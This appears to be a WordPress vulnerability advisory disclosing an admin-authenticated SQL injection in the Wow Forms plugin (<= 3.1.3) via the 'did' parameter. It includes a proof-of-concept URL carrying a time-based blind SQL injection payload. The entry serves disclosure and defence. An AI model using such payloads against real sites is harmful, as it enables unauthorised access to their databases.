WordPress Plugin Vulnerabilities

Wow Forms <= 3.1.3 - Admin+ SQL Injection

Description

The plugin does not sanitise or escape a 'did' GET parameter before using it in a SQL statement, when deleting a form in the admin dashboard, leading to an authenticated SQL injection

Proof of Concept

https://plugins.trac.wordpress.org/browser/mwp-forms/trunk/admin/partials/main.php#L13

As admin, https://example.com/wp-admin/admin.php?page=mwp-forms&info=del&did=1%20AND%20(SELECT%209063%20FROM%20(SELECT(SLEEP(5)))YGWC)

Affects Plugins

No known fix

References

Classification

Type
SQLI
OWASP top 10
CWE
CVSS

Miscellaneous

Original Researcher
Shreya Pohekar of Codevigilant Project
Verified
Yes

Timeline

Publicly Published
2021-10-07 (about 2 years ago)
Added
2021-10-07 (about 2 years ago)
Last Updated
2022-04-12 (about 2 years ago)

Other